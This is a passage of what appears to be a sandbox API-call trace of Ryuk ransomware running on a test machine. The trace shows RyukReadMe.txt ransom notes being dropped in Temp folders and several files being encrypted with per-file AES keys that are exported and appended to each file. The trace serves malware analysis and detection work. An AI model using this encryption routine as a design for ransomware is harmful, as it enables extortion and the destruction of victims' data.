dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.823] GetLastError () returned 0x0 [0143.823] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0143.824] CloseHandle (hObject=0x198) returned 1 [0143.825] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.825] SetLastError (dwErrCode=0x0) [0143.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.825] GetLastError () returned 0xb7 [0143.825] CloseHandle (hObject=0x198) returned 1 [0143.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0143.825] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.825] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.825] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0143.825] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0143.825] SetLastError (dwErrCode=0x0) [0143.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.827] GetLastError () returned 0x0 [0143.827] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0143.828] CloseHandle (hObject=0x198) returned 1 [0143.828] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.828] SetLastError (dwErrCode=0x0) [0143.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.828] GetLastError () returned 0xb7 [0143.828] CloseHandle (hObject=0x198) returned 1 [0143.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0143.828] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.829] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.829] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0143.829] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0143.829] SetLastError (dwErrCode=0x0) [0143.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.829] GetLastError () returned 0x0 [0143.829] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0143.830] CloseHandle (hObject=0x198) returned 1 [0143.830] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0143.830] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0143.831] SetLastError (dwErrCode=0x0) [0143.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.831] GetLastError () returned 0xb7 [0143.831] CloseHandle (hObject=0x194) returned 1 [0143.831] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.831] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.831] SetLastError (dwErrCode=0x0) [0143.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.831] GetLastError () returned 0xb7 [0143.831] CloseHandle (hObject=0x190) returned 1 [0143.831] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.831] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.832] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\um2hqG2SEILUGfXl.wav", dwFileAttributes=0x80) returned 1 [0143.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\um2hqG2SEILUGfXl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\um2hqg2seilugfxl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.832] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=90613) returned 1 [0143.833] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=90613) returned 1 [0143.833] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x160d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.833] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.833] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.833] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.833] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.834] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.834] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x161f5, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x161f5, lpOverlapped=0x0) returned 1 [0143.835] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.836] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x161f5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x16200) returned 1 [0143.836] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.836] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16200, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x16200, lpOverlapped=0x0) returned 1 [0143.837] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.837] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.837] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.837] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.837] CloseHandle (hObject=0x190) returned 1 [0143.867] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.871] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.871] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.872] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.872] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\V7N_He.swf", dwFileAttributes=0x80) returned 1 [0143.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\V7N_He.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\v7n_he.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.872] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=14517) returned 1 [0143.872] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=14517) returned 1 [0143.872] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x3793, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.872] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.873] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.873] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.873] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.873] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.873] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x38b5, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x38b5, lpOverlapped=0x0) returned 1 [0143.874] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.874] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x38b5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x38c0) returned 1 [0143.874] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.874] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x38c0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x38c0, lpOverlapped=0x0) returned 1 [0143.874] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.874] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.874] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.874] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.874] CloseHandle (hObject=0x190) returned 1 [0143.890] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.894] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.895] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.895] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.895] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.895] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VZxoE0B3Qd4a.mkv", dwFileAttributes=0x80) returned 1 [0143.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VZxoE0B3Qd4a.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vzxoe0b3qd4a.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.895] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=52904) returned 1 [0143.895] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=52904) returned 1 [0143.895] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xcd86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.895] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.896] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.896] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.896] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.896] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.896] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xcea8, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xcea8, lpOverlapped=0x0) returned 1 [0143.897] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.897] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xcea8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xceb0) returned 1 [0143.897] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.897] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xceb0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xceb0, lpOverlapped=0x0) returned 1 [0143.898] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.898] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.898] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.898] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.898] CloseHandle (hObject=0x190) returned 1 [0143.916] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.920] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.920] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.920] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.920] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\W417.csv", dwFileAttributes=0x80) returned 1 [0143.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\W417.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\w417.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.921] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=49299) returned 1 [0143.921] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=49299) returned 1 [0143.921] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xbf71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.921] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.921] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.922] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.922] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.922] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.922] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc093, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xc093, lpOverlapped=0x0) returned 1 [0143.922] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.923] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xc093, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xc0a0) returned 1 [0143.923] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.923] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc0a0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xc0a0, lpOverlapped=0x0) returned 1 [0143.923] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.923] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.923] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.923] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.923] CloseHandle (hObject=0x190) returned 1 [0143.939] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.943] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.943] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.944] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.944] SetLastError (dwErrCode=0x0) [0143.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.944] GetLastError () returned 0xb7 [0143.944] CloseHandle (hObject=0x190) returned 1 [0143.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.944] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.944] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.944] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.944] SetLastError (dwErrCode=0x0) [0143.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wpdnse\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.945] GetLastError () returned 0x0 [0143.945] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0143.945] CloseHandle 